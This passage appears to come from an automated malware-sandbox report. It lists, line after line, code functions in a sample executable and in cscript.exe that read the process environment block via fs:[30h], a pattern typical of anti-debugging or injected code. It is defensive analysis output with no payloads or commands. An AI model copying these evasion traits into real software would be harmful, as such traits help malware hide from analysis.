          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0549A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
